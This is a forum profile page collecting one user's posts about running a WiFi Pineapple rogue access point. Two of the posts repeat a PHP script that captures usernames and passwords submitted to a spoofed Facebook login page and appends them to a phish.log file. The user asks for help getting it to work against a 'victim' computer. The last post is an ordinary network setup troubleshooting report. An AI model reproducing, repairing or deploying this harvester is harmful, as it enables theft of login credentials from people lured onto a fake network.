Jump to content

AlienG

Active Members
  • Posts

    9
  • Joined

  • Last visited

Posts posted by AlienG

  1. digip,

    Thanks a lot and not sure why I named SCP might be the frustration of been working with this for hours butr anyways. Not sure what am I doing wrong here but I tried your script and is showin an error on line 27 and 28. Also to make sure I am doing everything else correct.

    The victim/test computer has to connect to the "pineapple SSID" right?

    When I log in to "facebook.com" shows on the URL www.facebook.com/facebook.html, which it is correct, I think...

    then the page after trying to log in return to the same page like an error.

    after that I check on the phish.log folder and appears empty.

  2. Can someone help me put? My problem is that on the below script after testing Facebook page nothing was saved on phish.log. Or should I use the one Darren has posted? Thanks

    <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) {        $nam = stripslashes($_POST['name']);        $pas = stripslashes($_POST['pass']);        $nam = htmlspecialchars($nam, ENT_QUOTES);        $pas = htmlspecialchars($pas, ENT_QUOTES);        $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;        $filed = @fopen("pineapple/phish.log", "a+");        @fwrite($filed, "$content\n");        @fclose($filed); } ?>

    <html><body>

    <script type=text/javascript">

    function goBack()

    {

    window.history.back()

    }

    </script>

    </head>

    <body onload="goBack()">

    </body></html>

  3. Can someone help me put? My problem is that on the below script after testing Facebook page nothing is saved on pineapple.log. Or should I use the one Darren has posted? Thanks

    <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) {        $nam = stripslashes($_POST['name']);        $pas = stripslashes($_POST['pass']);        $nam = htmlspecialchars($nam, ENT_QUOTES);        $pas = htmlspecialchars($pas, ENT_QUOTES);        $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;        $filed = @fopen("pineapple/phish.log", "a+");        @fwrite($filed, "$content\n");        @fclose($filed); } ?>

    <html><body>

    <script type=text/javascript">

    function goBack()

    {

    window.history.back()

    }

    </script>

    </head>

    <body onload="goBack()">

    </body></html>

  4. DID

    {Go into your network manager, "Edit Connections", click on "Wired Connection", Un-check the box that says "Automatically Connect", Save Settings, Re-run wp4.sh}

    Pineapple Netmask [255.255.255.0]:

    Pineapple Network [172.16.42.0/24]:

    Interface between PC and Pineapple [eth0]:

    Interface between PC and Internet [wlan0]:

    Internet Gateway [192.168.2.1]: XXX.XXX.X.X

    IP Address of Host PC [172.16.42.42]:

    IP Address of Pineapple [172.16.42.1]:

    _ . ___ \||/ Internet: 192.168.2.1 - wlan0

    ( _ )_ <--> [___] <--> ,<><>, Computer: 172.16.42.42

    (_ _(_ ,) \___\ '<><>' Pineapple: 172.16.42.0/24 - eth0

    Browse to http://172.16.42.1/pineapple -- Happy Hacking!

    But it won't connect from browser not sure why.... :blink:

    • Pineapple Hardware Version Mark IV
    • Pineapple Software Version 2.1
    • OS used to connect to the pineapple: Ubuntu
    • Network layout of how your setup is connected (including IP information): Ethernet cable from AP to Pineapple LAN port, Ethernet cable from PoE to PC.
    • Ping results from computer to pineapple: None
    • Is the problem repeatable (Yes/No): Yes
    • Steps taken which created the problem: Initial installation
    • Error Messages: "connecting to wifipineapple.com | 69.163.250.20 | :80... stay just like that
    • Log file information:

×
×
  • Create New...